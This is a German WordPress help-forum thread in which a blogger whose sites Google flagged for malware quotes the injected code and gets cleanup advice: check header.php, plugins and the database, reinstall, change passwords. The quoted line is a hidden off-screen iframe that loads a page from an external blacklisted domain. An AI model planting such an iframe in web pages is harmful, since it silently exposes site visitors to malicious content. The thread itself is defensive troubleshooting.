Google meldet Malware

  • Hallo,

    ich bin verzweifelt.
    Am Freitag hat google mir gesagt das meine beiden Blogs
    eine Malware enthalten würden.
    Wie kann das sein, wenn man WP immer aktuell hält?
    Es geht um dieses hier;

    Zitat

    <iframe id="modyd" name="modyd" style="position:absolute; height: 90px; width:110px; left:5000px; top:110px;" src="http://www.redqdn.com/admin/avidstats.php?id=171380">


    Ich kann aber wirklich den Fehler nirgends finden...
    Kennt jemand das Problem und kann mir sagen, was ich genau löschen müsste?
    Mein PC ist sauber, den habe ich mehrfach gscannt, auch habe ich mein ftp-Paßwort und
    meine Blogpaßwörter geändert. Auch habe ich schon öfters
    die Seiten gelöscht und wieder neu aufgespielt und dann bei google
    die erneute Prüfung beantragt. Aber immer wieder soll
    das noch drauf sein. Ich weiß aber nicht wo......

    Kann mir wer bitte helfen was ich noch machen soll/kann?
    Mit Datenbanken kenne ich mich nicht so aus. Muß ich auch dabei gehen?
    Wenn ja wie?

    Vielen lieben Dank.

    bis dann Joerg

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hallo,

    danke für die schnelle Antwort; meine Antwort ist: 1 und 1.
    Wieso?
    Und wie reinige ich den Server?
    Dann muß ich wohl mal 1und1 nach Backups fragen.......

    bis dann Joerg

    Einmal editiert, zuletzt von scorpio76 (24. Februar 2014 um 11:17)

  • 1und1 sperrt bei der Feststellung von Schadsoftware sofort die Domains, so ist es jedenfalls mir bekannt.

    Bis Google eine Meldung rausgibt, vergeht etwas zeit. Wobei in dem Schreiben von Google Prüfungsschritte für dich angegeben sind. Hast du diese Prüfung durchgeführt?

    Hast du mal oben mit dem Link getestet?

  • Hallo,

    Zitat

    Javascript included from a blacklisted domain.
    Details:
    ://sucuri.net/malware/entry/MW:BLK:2
    Javascript: ww.redqdn.com


    (die Links habe ich etwas gekürzt, damit nicht jeder Dau drauf klickt)

    das war die Antwort von der Seite. Mehr steht da nicht.
    Habe 1und1 gebeten mal den Server zu reinigen ;) , mal sehen ob das etwas bringt.
    Habe schon mehrfach meine Seiten gelöscht und neu aufgespielt und auch
    bei google beantragt diese wieder zu öffnen.
    Aber die bleiben geschlossen.
    Warum weiß ich nicht.

    Was das für ein Müll ist, weiß ich nicht, kenne mich mit frames nicht so aus.

    bis dann Joerg

  • Zitat

    Was das für ein Müll ist, weiß ich nicht, kenne mich mit frames nicht so aus.


    wenn du das nicht selbst eingesetzt hast, dann lösche es doch. Du schreibst, dass es als Fehlerquelle benannt wird, lässt es aber weiter drin...ist doch absurd.
    1&1 wird deinen Server nicht reinigen. Das musst Du selbst machen.
    Bevor Du Google wieder aufforderst, prüfe, ob die Seiten für G. überhaupt erreichbar sind.


  • Habe schon mehrfach meine Seiten gelöscht und neu aufgespielt und auch
    bei google beantragt diese wieder zu öffnen.

    Ich würde auch die Sicherheitslücke eben suchen und beseitigen.


    Aber die bleiben geschlossen.
    Warum weiß ich nicht.

    Du kannst die Überprüfung beantragen.
    https://support.google.com/webmasters/answer/168328?hl=de

    dauert ein zwei Tage...

    Mit offenen Augen träumen

  • wenn du das nicht selbst eingesetzt hast, dann lösche es doch. Du schreibst, dass es als Fehlerquelle benannt wird, lässt es aber weiter drin...ist doch absurd.
    1&1 wird deinen Server nicht reinigen. Das musst Du selbst machen.
    Bevor Du Google wieder aufforderst, prüfe, ob die Seiten für G. überhaupt erreichbar sind.

    Hallo,

    ich kann das nicht löschen, weil ich nicht weiß wo das steht.
    google gibt das zwar als snippet, aber löschen kann ich das nicht.
    Wie bereinige ich den Server?
    Darauf habe ich doch gar keinen Zugriff?
    Doch nur auf meine Ordner und diese habe ich schon mehrfach gelöscht.

    bis dann Joerg

  • Überprüfe alle Theme- und PlugIn-Dateien nach dem Link/Iframe (mit einmal guten FTP-Programm kannst du mehrere Dateien gleichzeitig durchsuchen). Zusätzlich überprüfe auch deine DB danach (via phpmyadmin). Und bügle eine saubere neue WP-Installation manuell über deine.
    Weiters mußt du, wie r23 schon schrieb, das Leck finden.

  • zumeist steht sowas in der header.php oder der footer.php.


    Heute trägst Du den Titel "HELD des Tages"!

    Bingo!!!

    D-A-N-K-E!

    Muß ich jetzt jede header.php durch gehen oder reichen die, welche ich gefunden habe?
    Wie zum Teufel kommt das daran da rein?
    Und wie verhindere ich das in Zukunft?

    bis dann Joerg

  • Überprüfe alle Theme- und PlugIn-Dateien nach dem Link/Iframe (mit einmal guten FTP-Programm kannst du mehrere Dateien gleichzeitig durchsuchen). Zusätzlich überprüfe auch deine DB danach (via phpmyadmin). Und bügle eine saubere neue WP-Installation manuell über deine.
    Weiters mußt du, wie r23 schon schrieb, das Leck finden.

    Kann man das auch mit filezilla machen?
    Wie finde ich das Leck, davon habe ich doch keine Ahnung wie das rein kam?

    bis dann Joerg

  • wieviele header.php hast Du denn?
    Lösche auf jeden Fall schon mal alle deaktivierten Plugins und, bis auf ein Standardtheme wie 2014, alle weiteren Themes. Dann ab auf den Server und alles, was nicht mit dieser WP Installtion zu tun hat löschen. WP Passwort + Zugangsname ändern, lösche dann den "admin" :) Aber prüfe vorher, ob sich der neue User mit Adminrechten einloggen kann. ftp-Zugang nicht auf dem PC (im Programm) speichern und vorallem ändern.

  • Hallo,

    zwischen Frage:
    Brauche ich die im wp-content enthaltenden alten Uploadsordner?
    Wenn ich schonmal am aufräumen bin.......

    p.s.
    Ich melde mich erstmal ab, es sind in sämtlichen header.php diese
    scheiß Dinger drin.

    Wir sehen uns im nächsten Jahrhundert :-o

    Und

    D-A-N-K-E

    für die Hilfe bis hier her.

    bis dann Joerg

    Einmal editiert, zuletzt von scorpio76 (24. Februar 2014 um 13:35)

  • Hallo,

    ich bräuchte noch eine Antwort für die Frage hier drüber und
    wie sehe ich Veränderungen an meinen Datenbanken?
    Wie sollte ich dort einen Fehler finden?
    Kenne mich mit DB nicht so aus, da bräuchte ich bitte HILFE!

    Braucht man die wpau_upgrade_log und die wpau_active_plugins_info?
    Oder sind das die "Fehler"?

    bis dann Joerg

    Einmal editiert, zuletzt von scorpio76 (24. Februar 2014 um 18:38)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!